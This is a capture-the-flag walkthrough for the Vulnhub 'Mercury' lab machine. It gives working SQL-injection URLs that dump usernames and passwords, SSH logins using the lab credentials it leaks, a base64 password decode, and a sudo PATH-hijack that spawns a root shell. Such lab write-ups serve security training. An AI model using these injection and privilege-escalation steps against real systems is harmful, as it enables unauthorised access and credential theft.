Mercury

You’ll find this vm in Vulnhub https://www.vulnhub.com/entry/the-planets-mercury,544/

SQL injection

Step 1

http://10.0.2.5:8080/mercuryfacts/1 UNION SELECT username from users--/
('john',), ('laura',), ('sam',), ('webmaster',))

Step 2

http://10.0.2.5:8080/mercuryfacts/1 UNION SELECT password from users--/
 ('johnny1987',), ('lovemykids111',), ('lovemybeer111',), ('mercuryisthesizeof0.056Earths',))

SSH webmaster, find encoded passwords

  cd mecury_proj/
  ls
  cat notes.txt

Base64 decode the password

echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
mercurymeandiameteris4880km

SSH linuxmaster

• linuxmaster:mercurymeandiameteris4880km

1	(root : root) SETENV: /usr/bin/check_syslog.sh

1 2 3

cat /usr/bin/check_syslog.sh #!/bin/bash tail -n 10 /var/log/syslog

1 2 3 4

echo "/bin/bash" > tail chmod 777 tail export PATH=.:$PATH sudo PATH=$PATH /usr/bin/check_syslog.sh